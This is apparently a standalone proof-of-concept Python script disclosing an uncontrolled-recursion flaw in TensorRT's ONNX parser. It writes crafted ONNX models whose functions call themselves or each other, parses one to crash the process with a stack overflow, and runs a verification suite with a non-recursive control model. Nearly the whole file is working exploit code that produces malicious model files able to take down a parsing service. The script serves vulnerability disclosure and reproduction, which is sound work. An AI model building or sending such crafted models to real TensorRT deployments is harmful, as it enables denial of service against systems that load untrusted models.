# tensorrt-onnx-recursive-function-crash / vuln010_standalone_poc.py
# treforbenbow: Upload vuln010_standalone_poc.py with huggingface_hub
# 4d6c78f (verified)
"""
VULN-010: Uncontrolled Recursion in TensorRT ONNX Parser via Recursive FunctionProto
=====================================================================================
A 110-byte ONNX model with a self-referencing FunctionProto crashes TensorRT's
ONNX parser with a stack overflow (STATUS_STACK_OVERFLOW / 0xC00000FD) during
parse(). The parser recurses without bound while expanding the function
definition, exhausting the call stack.
CWE: CWE-674 (Uncontrolled Recursion)
Affected: TensorRT 10.x nvonnxparser (parse phase)
Severity: High (CVSS 7.5) — DoS via crafted model file
To reproduce:
    python vuln010_standalone_poc.py build   # Create PoC .onnx files
    python vuln010_standalone_poc.py crash   # Trigger crash (will terminate)
    python vuln010_standalone_poc.py verify  # Full verification suite
"""
import os
import signal
import subprocess
import sys
import time
# Absolute directory holding this script; the PoC models are written next to it.
POC_DIR = os.path.abspath(os.path.dirname(__file__))
# Model built by cmd_build() from a function whose body calls itself.
SELF_REC_PATH = os.path.join(POC_DIR, "vuln010_self_recursive.onnx")
# Model built by cmd_build() from two functions that call each other.
MUTUAL_REC_PATH = os.path.join(POC_DIR, "vuln010_mutual_recursive.onnx")
def cmd_build():
    """Write both PoC models to disk, then run each through onnx.checker.

    Two files are produced:

    * SELF_REC_PATH: function "R" (domain "r") whose only node calls "R".
    * MUTUAL_REC_PATH: functions "A" and "B" (domain "m") that call each
      other.

    The size of each serialized model is printed. The checker verdict for each
    file is only reported; a checker failure does not abort the build.
    """
    from onnx import helper, TensorProto

    def opsets(domain):
        """Return the opset imports: default domain v17 plus *domain* v1."""
        return [helper.make_opsetid("", 17), helper.make_opsetid(domain, 1)]

    def forwarding_function(domain, name, callee):
        """Build function *name* whose single node calls *callee*."""
        body = [helper.make_node(callee, ["X"], ["Y"], domain=domain)]
        return helper.make_function(
            domain, name, ["X"], ["Y"], body, opset_imports=opsets(domain))

    def serialize(entry_op, domain, functions):
        """Wrap *functions* in a one-node graph calling *entry_op*; return bytes."""
        graph_in = helper.make_tensor_value_info("i", TensorProto.FLOAT, [1])
        graph_out = helper.make_tensor_value_info("o", TensorProto.FLOAT, [1])
        call = helper.make_node(entry_op, ["i"], ["o"], domain=domain)
        graph = helper.make_graph([call], "g", [graph_in], [graph_out])
        proto = helper.make_model(
            graph, opset_imports=opsets(domain), functions=functions)
        proto.ir_version = 8
        return proto.SerializeToString()

    # PoC 1: "R" is defined in terms of itself.
    payload = serialize("R", "r", [forwarding_function("r", "R", "R")])
    with open(SELF_REC_PATH, "wb") as out:
        out.write(payload)
    print(f"[+] Self-recursive PoC: {SELF_REC_PATH} ({len(payload)} bytes)")

    # PoC 2: "A" calls "B" and "B" calls "A".
    pair = [
        forwarding_function("m", "A", "B"),
        forwarding_function("m", "B", "A"),
    ]
    payload = serialize("A", "m", pair)
    with open(MUTUAL_REC_PATH, "wb") as out:
        out.write(payload)
    print(f"[+] Mutual-recursive PoC: {MUTUAL_REC_PATH} ({len(payload)} bytes)")

    # Reload each file with the Python onnx package and report what its
    # checker says about the model.
    import onnx
    from onnx import checker
    for poc_path in (SELF_REC_PATH, MUTUAL_REC_PATH):
        loaded = onnx.load(poc_path)
        try:
            checker.check_model(loaded)
            print(f"[+] onnx.checker passes: {os.path.basename(poc_path)}")
        except Exception as err:
            print(f"[!] onnx.checker fails: {os.path.basename(poc_path)}: {err}")
    print("\n[*] Run 'python vuln010_standalone_poc.py crash' to trigger the crash.")
def cmd_crash():
    """Parse the self-recursive PoC with TensorRT inside this process.

    The parse call is expected to take the interpreter down, so nothing after
    it normally runs. If the PoC file has not been built yet, a hint is
    printed and the function returns without importing TensorRT.
    """
    # Without this guard a missing file makes parse_from_file() return False
    # and the script would report an "unexpected" non-crash, which is
    # misleading. cmd_verify() performs the same check.
    if not os.path.exists(SELF_REC_PATH):
        print("[!] PoC files not found. Run 'build' first.")
        return

    import tensorrt as trt

    print("[*] Loading self-recursive PoC with TensorRT...")
    print(f"[*] File: {SELF_REC_PATH}")
    print("[!] This WILL crash the process with stack overflow.")
    print()
    logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(logger)
    network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
    parser = trt.OnnxParser(network, logger)
    # Flush explicitly: when stdout is a pipe or file it is block-buffered,
    # and a hard crash would discard everything printed so far.
    print("[*] Calling parser.parse_from_file()...", flush=True)
    ok = parser.parse_from_file(SELF_REC_PATH)
    # Should never reach here
    print(f"[?] parse returned: {ok} (unexpected - should have crashed)")
# Number of parse attempts per PoC file and the per-subprocess time limits.
_TRIALS = 5
_PARSE_TIMEOUT_S = 15
_CONTROL_TIMEOUT_S = 30

# Child script for one parse attempt. The model path is passed as sys.argv[1]
# rather than interpolated into the source, so a path containing quotes or
# ending in a backslash cannot corrupt the script.
_PARSE_SCRIPT = '''
import tensorrt as trt, sys
logger = trt.Logger(trt.Logger.ERROR)
builder = trt.Builder(logger)
network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
ok = parser.parse_from_file(sys.argv[1])
print(f"PARSE_{'OK' if ok else 'FAIL'}")
'''

# Child script for the control run: a model with a non-recursive function
# ("MyRelu" wrapping Relu) that is parsed and, if parsing succeeds, built.
_CONTROL_SCRIPT = '''
import tensorrt as trt, sys
from onnx import helper, TensorProto
func = helper.make_function("f", "MyRelu", ["X"], ["Y"],
    [helper.make_node("Relu", ["X"], ["Y"])],
    opset_imports=[helper.make_opsetid("", 17)])
g = helper.make_graph(
    [helper.make_node("MyRelu", ["input"], ["output"], domain="f")],
    "g",
    [helper.make_tensor_value_info("input", TensorProto.FLOAT, [2, 3])],
    [helper.make_tensor_value_info("output", TensorProto.FLOAT, [2, 3])])
model = helper.make_model(g, opset_imports=[
    helper.make_opsetid("", 17), helper.make_opsetid("f", 1)],
    functions=[func])
model.ir_version = 8
logger = trt.Logger(trt.Logger.ERROR)
builder = trt.Builder(logger)
network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
ok = parser.parse(model.SerializeToString())
print(f"PARSE_{'OK' if ok else 'FAIL'} layers={network.num_layers}")
if ok:
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 256 << 20)
    engine = builder.build_serialized_network(network, config)
    print(f"BUILD_{'OK' if engine else 'FAIL'}")
'''


def _last_line(text, default="?"):
    """Return the last line of *text* after stripping, or *default* if empty."""
    stripped = text.strip()
    return stripped.split("\n")[-1] if stripped else default


def _classify_exit(returncode, stdout, stderr):
    """Map a finished child process to a ``(status, crashed)`` pair.

    *status* is the label printed for the trial; *crashed* is True only when
    the child died abnormally. A Python-level failure (exit code 1 with a
    traceback, e.g. TensorRT not installed) is reported as ``PYTHON_ERROR``
    and is NOT counted as a crash.
    """
    if returncode == 0:
        return _last_line(stdout), False
    # Mask so a status reported as a negative signed value still compares
    # equal to the unsigned constants below.
    code = returncode & 0xFFFFFFFF
    if code == 0xC00000FD:
        return "STACK_OVERFLOW", True
    if code == 0xC0000005:
        return "ACCESS_VIOLATION", True
    if returncode < 0 and os.name == "posix":
        # On POSIX a negative return code -N means "terminated by signal N".
        try:
            sig_name = signal.Signals(-returncode).name
        except ValueError:
            sig_name = f"SIG{-returncode}"
        return f"CRASH_{sig_name}", True
    if returncode == 1 and "Traceback (most recent call last)" in stderr:
        return "PYTHON_ERROR", False
    return f"CRASH_0x{code:08X}", True


def cmd_verify():
    """Run the verification suite, isolating every parse in a subprocess.

    Each PoC file is parsed ``_TRIALS`` times in a fresh interpreter and the
    way each child ended is reported. A control model with a non-recursive
    function is then parsed and built once. If either PoC file is missing, a
    hint is printed and nothing is run.
    """
    print("=" * 60)
    print("VULN-010 Verification Suite")
    print("=" * 60)
    tests = [
        ("Self-recursive (parse_from_file)", SELF_REC_PATH),
        ("Mutual-recursive (parse_from_file)", MUTUAL_REC_PATH),
    ]
    # Check every file up front; os.path.getsize() below would otherwise
    # raise FileNotFoundError part-way through the suite.
    if not all(os.path.exists(path) for _, path in tests):
        print("[!] PoC files not found. Run 'build' first.")
        return

    for desc, model_path in tests:
        print(f"\n[*] Test: {desc}")
        print(f" File: {model_path} ({os.path.getsize(model_path)} bytes)")
        crash_count = 0
        for trial in range(1, _TRIALS + 1):
            detail = ""
            t0 = time.monotonic()
            try:
                r = subprocess.run(
                    [sys.executable, "-c", _PARSE_SCRIPT, model_path],
                    capture_output=True, text=True, timeout=_PARSE_TIMEOUT_S)
            except subprocess.TimeoutExpired:
                status, crashed = "TIMEOUT", False
                dt = float(_PARSE_TIMEOUT_S)
            else:
                dt = time.monotonic() - t0
                status, crashed = _classify_exit(r.returncode, r.stdout, r.stderr)
                if status == "PYTHON_ERROR":
                    detail = _last_line(r.stderr, "")
            if crashed:
                crash_count += 1
            print(f" Trial {trial}/{_TRIALS}: {status} ({dt:.1f}s)")
            if detail:
                # Show why the child failed so an environment problem is
                # not mistaken for the vulnerability.
                print(f"   {detail}")
        print(f" Result: {crash_count}/{_TRIALS} crashes "
              f"({crash_count * 100 // _TRIALS}% reproducible)")

    # Control test: non-recursive function should NOT crash
    print("\n[*] Control test: non-recursive function (should NOT crash)")
    try:
        r = subprocess.run(
            [sys.executable, "-c", _CONTROL_SCRIPT],
            capture_output=True, text=True, timeout=_CONTROL_TIMEOUT_S)
    except subprocess.TimeoutExpired:
        print(f" TIMEOUT after {_CONTROL_TIMEOUT_S}s")
    else:
        print(f" {r.stdout.strip()}")
        _, crashed = _classify_exit(r.returncode, r.stdout, r.stderr)
        if r.returncode == 0:
            verdict = "OK"
        elif crashed:
            verdict = "CRASH"
        else:
            verdict = "ERROR"
        print(f" Exit code: {r.returncode} ({verdict})")
        if verdict == "ERROR":
            print(f"   {_last_line(r.stderr, '')}")
    print("\n" + "=" * 60)
    print("VERIFICATION COMPLETE")
    print("=" * 60)
if __name__ == "__main__":
    # Command-line entry point: the first argument selects the sub-command.
    commands = {
        "build": cmd_build,
        "crash": cmd_crash,
        "verify": cmd_verify,
    }
    usage = "Usage: python vuln010_standalone_poc.py [build|crash|verify]"
    if len(sys.argv) < 2:
        print(usage)
        sys.exit(1)
    cmd = sys.argv[1]
    handler = commands.get(cmd)
    if handler is None:
        # An unknown command is a usage error like a missing one, so it
        # also exits non-zero and callers/scripts can detect it.
        print(f"Unknown command: {cmd}")
        print(usage)
        sys.exit(1)
    handler()